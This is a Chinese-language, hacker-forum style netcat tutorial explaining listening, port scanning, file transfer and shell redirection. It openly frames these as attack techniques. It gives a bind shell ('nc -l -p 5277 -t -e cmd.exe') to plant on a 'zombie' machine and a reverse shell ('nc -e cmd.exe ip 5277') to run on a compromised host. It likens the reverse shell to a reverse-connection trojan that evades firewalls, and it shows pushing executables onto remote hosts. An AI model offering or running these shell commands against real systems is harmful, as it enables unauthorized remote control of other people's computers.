NC（黑客界的瑞士軍刀）的用法

四個指令

指令1：監聽指令

nc -l -p port

nc -l -p port > e:\log.dat

nc -l -v -p port

參數解釋：

-l：監聽端口，監聽入站資訊

-p：後跟本地端口号

-v：顯示端口的資訊，如果使用-vv的話，則會顯示端口更詳細的資訊

提示：一般大家都愛用-vv

nc -l -p 80

這個很簡單，監聽80端口

如果機器上運作這個指令，端口80被認為是開放的，可以欺騙很多掃描器的哦！

nc -l -p 80 > e:\log.dat

呵呵，功能和上邊一樣，但是後邊加了個“> e:\log.dat”我想，學過ECHO

那個指令的人都會知道吧，是在E盤建立一個log.dat的日志檔案

nc -l -v -p 80

和上邊指令相似，不過這次不是記錄在檔案裡，而是會直接顯示在運作着NC

的螢幕上。

呵呵，講了這麼多，來實踐下

nc -l -v -p 80

然後在浏覽器中輸入本機IP：127.0.0.1

呵呵，看到什麼？

同樣，上邊兩個也是一樣，大家自己試驗一下吧

指令2：程式定向

nc -l -p port -t -e cmd.exe

本地機： nc -l -p port 或 nc -l -v -p port

目标機：nc -e cmd.exe ip port

參數解釋：

-l、-p兩個參數已經解釋過了

-e；作用就是程式定向

-t：以telnet的形式來應答

例子

nc -l -p 5277 -t -e cmd.exe

知道運作在哪裡嗎？千萬不要運作在自己的機器上，如果運作了，你機器

就會變成一台TELNET的伺服器了，呵呵，解釋一下：監聽本地端口5277的

入站資訊，同時将CMD.exe這個程式，重定向到端口5277上，當有人連接配接的時候，就讓程式CMD.exe以TELNET的形式來響應連接配接要求。

說白了，其實就是讓他成為一台TELNET的殭屍電腦，是以這個指令要運作在你的殭屍電腦上。。（話外音：說這麼多遍當我們白癡啊，快往下講！！！）

呵呵，咱們來找台殭屍電腦試試，我TELNET IP 5277

HOHO~~如何？

local machine：nc -l -p port ( or nc -l -v -p port )

remote machine：nc -e cmd.exe ip port

大家知道灰鴿子和神偷吧，這兩款工具都是利用了反彈端口型的木馬，

什麼叫反彈端口？就是說，當對方中馬後，不用你主動和對方連接配接，也就是說

不用從你的client端向對方主機上運作的server端發送請求連接配接，而是對方主動來連接配接你

這樣就可以使很多防火牆失效，因為很多防火牆都不檢查出站請求的。

這裡這兩個指令結合在一起後，于那兩款木馬可以說有異曲同工之效。為什麼？

咳！！聽我給你講啊！！（先交100000000RMB學費)哇，别殺我啊！！)

nc -l -p 5277 （堅聽本地5277端口）

同樣也可以用

nc -l -v -p 5277

運作在本地

然後在遠端機器上，想辦法運作

nc -e cmd.exe ip 5277

（你可别真的打“ip”在肉機上啊）要打，xxx.xxx.xxx.xxx這樣！！

呵呵，看看在本地機器上出現了什麼？

這樣就是反彈~~在本地機器上得到了一個SHELL

指令3：掃描端口

nc -v ip port

nc -v -z ip port-port

nc -v -z -u ip port-port

參數解釋：

-z：将輸入輸出關掉，在掃描時使用

nc -v ip port

這個指令是針對某一個端口進行掃描

例如：

nc -v ip 135

掃描遠端主機的135端口，這樣獲得了該端口的一些簡單資訊，但是針對某些端口，我們還可以獲得更多的資訊

例如：80端口

我們可以使用nc -v ip 80 然後使用get方法來獲得對方的WEB伺服器的資訊

nc -v -z ip port-port

這個指令是用來掃描的一個指令，這個指令用于快速掃描TCP端口，而port-port則是指定了掃描的端口範圍

例如：

nc -v -z ip 1-200

可以看到我機器上的1-200的TCP端口的開放情況

nc -v -z -u ip port-port

這個指令比上個指令多了個-u，這個指令的作用仍然是掃描端口，隻是多了一個-u的參數，是用來掃UDP端口的

例如：

nc -v -z -u ip 1-200

這個指令就會掃1-200的UDP端口

指令4：傳送檔案（HOHO，I LIKE）

LOCAL MACHINE：nc -v -n ip port < x:\svr.exe

REMOTE MACHINE：nc -v -l -p port > y:\svr.exe

參數解釋：

-n：指定數字的IP位址

這兩個指令結合起來是用來傳送檔案的

首先，在遠端機上運作指令：

nc -v -l -p 5277 > c:\pulist.exe

這個指令還記的嗎？呵呵，是不是和監聽指令有點類似，對，沒錯，這個是監聽5277端口

并把接受到的資訊資料寫到c:\pulist.exe中

這時候在本地機上運作

nc -v -n ip 5277 < e:\hack\pulist.exe

這個指令的意思就是，從本地E盤跟目錄中讀取pulist.exe檔案的内容，并把這些資料發送到ip的5277端口上

這樣遠端主機就會自動建立一個pulist.exe檔案。。呵呵，你想到了嗎？？

上邊是NC的比較常用的方法，希望通過這些，大家能發揮自己的想象力，創造出更多更精彩的指令來，

因為NC的用法不僅僅局限于這幾種而已哦！！對NC來說，隻有想不到，沒有做不到的！！！

絕對是居家旅行，饋贈親友的好東西啊